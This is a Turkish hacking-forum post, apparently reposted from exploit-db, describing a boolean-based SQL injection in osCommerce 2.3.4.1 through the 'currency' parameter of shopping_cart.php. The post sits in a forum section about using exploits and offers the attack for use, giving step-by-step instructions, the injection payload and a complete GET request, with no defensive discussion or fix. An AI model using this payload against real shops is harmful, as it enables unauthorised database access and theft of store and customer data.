İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

osCommerce 2.3.4.1 - 'currency' SQL Vulnerabilities

14-02-2019 01:44
#1
Kacamax - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Nereden:
Sivas / 58
Yaş:
30
Mesajlar:
654
Teşekkür (Etti):
167
Teşekkür (Aldı):
66
Konular:
190
Ticaret:
(0) %
# Exploit Title / Exploit Basllig: osCommerce 2.3.4.1 - 'currency' SQL Vulnerabilities
# Dork: N/A
# Date / Tarih: 05-02-2019
# Author / Ekleyen: Mehmet EMIROGLU
# Vendor Homapage / Yapimci Adresi: https://www.oscommerce.com
# Script Adresi: https://www.oscommerce.com/Products
# Version / Versiyon: 2.3.4.1
# Category / Kategori: Webapps
# Tested on / Test edilen isletim sistemi: Wampp @win
# CVE: N/A

Aciklama:
osCommerce Online Magaza olarak kullanilan yazilimlardan birisidir.
Hem Kullanici hemde Admin panelinde 8,855 ten fazla Eklentisi bulunan bir yazilimdir.

# Güvenliik Acigi
# Bu acik osCommerce 2.3.4.1 versiyonunda bulunmaktadir..
# shopping_cart sekmesine girin shopping_cart.php?currency=1 URL'de ki "ID" degerini yüksek bir sayi ile degistirin


Örnek: http://localhost/oscommerce/catalog/...rency=99999999

# SQL (Boole Tabanli)
# Parametreler: para birimi
# Saldiri Türü: %27 oR 3620772=3620772 aNd %276199%27=%276199
# GET Istegi:
http://localhost/oscommerce/catalog/...cy=99999999%27
oR 3620772=3620772 aNd %276199%27=%276199

Exploit Adresi:
https://www.exploit-db.com/exploits/46328
Kullanıcı İmzası
“Bir soru sorulduğunda sorudan çok sana soruyu soranı tanımaya çalış”
BAGAY, Marschal Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı